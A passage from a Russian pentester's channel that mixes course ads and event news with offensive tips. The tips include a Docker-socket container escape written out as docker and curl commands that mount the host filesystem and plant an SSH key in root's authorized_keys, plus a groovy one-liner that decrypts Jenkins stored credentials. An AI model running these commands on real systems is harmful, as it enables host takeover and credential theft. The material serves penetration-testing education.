Как говорится… “Только без паники!”

https://github.com/BobTheShoplifter/Spring4Shell-POC

Возможно! Возможно… Есть новая страшная бага в Spring. Но судя по комментам, как будто опасность пытаются завышать. Будем следить за деталями.

Вот и пруфы. Вроде не выглядит суперпопулярным кейсом, но могу ошибаться.

Немного интересностей из моей жизни.

Кто-то в курсе того, чем я занимаюсь, кто-то нет. Многим может быть полезно узнать, а мне может быть полезно это рассказать.

Помимо хакинга я заинтересован образованием в своей любимой сфере, в сфере кибербезопасности. Я давно принимаю участие в подобных активностях. Так вот, немного новостей об этом…

```
Школа HackerU вышла из состава российской Ed- и HR-Tech группы компаний Humantek, входящей в международную технологическую группу Prytek.

Новое название компании — Образовательный центр по кибербезопасности CyberEd (cyber-ed.ru).

Новым управляющим партнёром Образовательного центра по кибербезопасности CyberEd стал Егор Богомолов — предприниматель отрасли информационной безопасности, эксперт по кибербезопасности с опытом работы в крупнейших ИБ компаниях РФ, этичный хакер.
```

Link: https://vc.ru/u/446473-cybered/391787-shkola-it-i-kiberbezopasnosti-hackeru-stanovitsya-obrazovatelnym-centrom-po-kiberbezopasnosti-cybered

Если ищите, где получить знания и умения для сферы кибербезопасности, то не найдете в России другой компании, где было бы объединено столько экспертов высокого уровня, делящихся знаниями в режиме открытого общения и поддержки учащихся.

Я рад и горжусь тем, что, так долго участвуя в работе компании в разных формах партнерства, приложил руку к развитию тысяч специалистов за последние несколько лет и теперь могу с еще большими возможностями влиять на эту сферу. Также, я понимаю на каком уровне сейчас находятся образовательные продукты в сфере компьютерной безопасности в России и вижу сколько нам еще предстоит попытаться сделать.

Надеюсь на светлое будущее этой отрасли и с каждым годом, увеличивая возможность влияния на ее успех, радуюсь тому как она процветает. Надеюсь и вас касается или коснется развитие этой сферы! (В хорошем смысле ;D )

#реклама

Каков сейчас рынок услуг ИБ? Просто посмотрите на это.

Длинные цепочки субподрядчиков, грабительские комиссии, непрозрачное ценообразование и сомнительные гарантии качества. Альтернатива?

Третья Сторона - первый маркетплейс услуг ИБ в России!
Работай напрямую с проверенными исполнителями, без посредников, с максимальной прозрачностью.

Ссылка на сайт

Наш уважаемый подписчик @C0ldheim на днях выступил на встрече DC7342 с докладом "PWN & Defense Dynamic Routing Protocols". Тема раскрыта очень хорошо и очень глубоко. ИМХО: данный доклад обязателен к просмотру всем, для кого слова "внутренний пентест" не пустой звук. https://www.youtube.com/watch?v=tzjFcIk-zfE
Также у автора есть репозитории с инструментами для атак на OSPF и EIGRP:

https://github.com/C0ldheim/EIGRPWN
http://github.com/C0ldheim/OSPFMD5Crack (особенно полезно)

Если вы оказались в docker контейнере, в который проброшен Docker API socket, то это может позволить выбраться из контейнера на хостовую машину. Для этого, например, можно запустить привилегированный контейнер, подмонтировать в него хостовую ФС и дальше, например, вписать свой ключ в /root/.ssh/authorized_keys:

docker run --privileged -v /:/mnt ubuntu echo key >> /mnt/root/.ssh/authorized_key

s

Это все понятно, но вот сегодня я в очередной раз оказался в контейнере с прокинутым docker.sock, но без docker CLI. Ситуация вполне возможна если вы пробрались в условный Gitlab используете docker shared runner и не знаете в каком из доступных образов есть docker cli, при этом прямого доступа в интернет нет.

Значит придется взаимодействовать с докеровским unix socket на прямую. Docker API Socket принимает запросы по протоколу HTTP (docs). А значит можно использовать curl ... --unix-socket /var/run/docker.sock.

Составил для себя список альтернативных docker команд:

docker image:

curl --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[].RepoTags'

docker ps:

curl --unix-socket /var/run/docker.sock http://localhost/containers/json | jq '.[] | "\(.Id) \(.Image)"'

docker pull:

curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/images/create?fromImage=busybox&tag=latest'

Создать привилегированный контейнер, в котором будет выполнена команда - (docker create):

curl --unix-socket /var/run/docker.sock -X POST 'http://localhost/containers/create' --data '{"Cmd":["/bin/bash","-c","echo key > /mnt/root/.ssh/authorized_keys"],"Image":"ubuntu","HostConfig":{"Binds":["/:/mnt/"],"RestartPolicy":{"Privileged":true}},"Tty":true}' -H "Content-Type: application/json"

docker start:

curl --unix-socket /var/run/docker.sock -X POST http://localhost/containers/<id>/start

docker logs:

curl --unix-socket /var/run/docker.sock 'http://localhost/containers/<id>/logs?stderr=1&stdout=1&tail=all' --output -

docker rm:

curl --unix-socket /var/run/docker.sock -X DELETE http://localhost/containers/<id>

Тут важно что нельзя одним запросом создать и запустить контейнер, как делает docker run. Под капотом он выполняет два HTTP запроса. Первый запрос возвращает айдишник, который нужно использовать в последующем.

Также, если curl тоже нету, то можно обращаться с unix socket через python, примерно так:

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect('/var/run/docker.sock')
sock.send('''GET /containers/json HTTP/1.1
Host: /var/run/docker.sock

''')
sock.recv(1024)

⚓️ Соскучились? Ждем вас на OFFZONE Meetup!

Привет! Мы давненько ничего не проводили очно.

Поэтому решили не дожидаться августовской встречи на OFFZONE и устроить митап в этом месяце.

Если вы тоже скучали по живому общению в тусовке безопасников, приходите на OFFZONE Meetup.

Мы подготовили 5 докладов: часть из них о технической начинке OFFZONE, а другая — ресерчи.

Митап бесплатный, нужна только регистрация.

🔴 Мы откроем запись и поделимся программой в следующий понедельник, 11 апреля в 16:00. Мест всего 60, так что stay tuned!

Дата и время: 22 апреля, 18:00–21:30
Место: офис BI.ZONE
Адрес: Москва, ул. Ольховская, д. 4, корп. 1, этаж 1.

О секретах Jenkins

Jenkins - CI/CD решение. А значит ему нужно где-то хранить креды для доступа к серверам, docker registry, nexus и так далее. В Jenkins есть встроенное хранилище Credentials. Фактически секреты сохраняются на файловой системе в файле .jenkins/credentials.xml (тут и далее .jekins - домашний каталог jenkins, может отличаться в зависимости от установки). Сами секреты зашифрованы. Но зашифрованы они ключами из двух файлов, которые тоже храняться на файловой системе: .jenkins/secrets/master.key и .jenkins/secrets/hudon.util.Secret. Таким образом доступ к этим файлам позволяет получить доступ ко всем сохраненным credentials всех пользователей.

Доступ к ФС может быть получен, например, если администраторы не уменьшили количество executor на master до значения 0, но для этого нужен доступ уровня разработчика в интерфейс Jenkins. Также на моей практике был и обратный случай, когда я попал на windows-сервер с правами пользователя и мог читать файлы Jenkins, один из паролей в сохраненных кредах подошел к интерфейсу Jenkins.

Для расшифрования секретов можно использовать скрипт.
Также, при доступе в интерфейс можно использовать groovy скрипт:

println( hudson.util.Secret.decrypt("{AQAAABAAAAAQ}") )

где в кавычках идет зашифрованная строка из credentials.xml. Скрипт этот можно выполнить в https://jenkins/noscript либо в build job'е с типом pipeline.
Статья с разбором устройства шифрования

Тройка инструментов findomain, unimap, fhc для супер понятного и быстрого сбора открытых веб портов:
findomain -qt hackerone.com | unimap --fast-scan --stdin --url-output | fhc

1) findomain - ищем поддомены
2) unimap - быстренько сканим порты
3) fhc - чекаем на доступный вебчик
4) PROFIT!

Считаю что это очень круто.

Подкасты

Многим это откликнулось, а я искренне хочу со своими друзьями и коллегами по цеху продолжить писать подкасты для вас. И я знаю хорошу тему для еще одного выпуска:

“N вопросов пентестеру”

N, потому что не знаю сколько их выйдет заранее;)

Предлагаю вам в этом поучаствовать и к тому же, я обещал разыграть донаты, которые вы накидали мне в прошлый раз.

Поэтому:

В комментариях к этому посту оставляйте вопросы, какие бы вы задали пентестеру (даже если вы сам пентестер;) ).

Лучший вопрос мы вознаградим в 100€ (EUR), а выберем его мы в конце самого подкаста.

Завтра завершаем рубрику для сбора вопросов, формулируем список и уже в ближайшее время позадаем их опытным специалистам под запись! ;)

Последний запуск длинных курсов
по информационной безопасности

Образовательный центр
по кибербезопасности CyberEd объявляет
о последнем запуске «длинных» курсов профессиям «Специалист по тестированию на проникновение» и «Специалист по информационной безопасности».

Курсы «живого» формата, с 80%-ной аудиторной нагрузкой в мае 2022 г. будут запущены в последний раз. В дальнейшем программы обучения будут переходить к более автономным и самостоятельным форматам.

Если интенсивное взаимодействие
с преподавателями и «живое» обучение — важные для вас факторы, приглашаем присоединиться к последнему потоку.

🔴 Специалист по тестированию на проникновение (RedTeam) - старт 23 мая 2022, длит. 9 мес.

🔵 Специалист по информационной безопасности (BlueTeam) - старт 30 мая 2022, длит. 7 мес.

🟣 Основы информационной безопасности (Основы) - старт 16 мая 2022, длит. 5,5 мес.

Хочу привлечь внимание к необычному формату повествования. Уверен, что тем, кто любит проникнуться романтикой хакинга, это будет то, что нужно.

В меру повествования и в меру технарских вещей.

Gg wp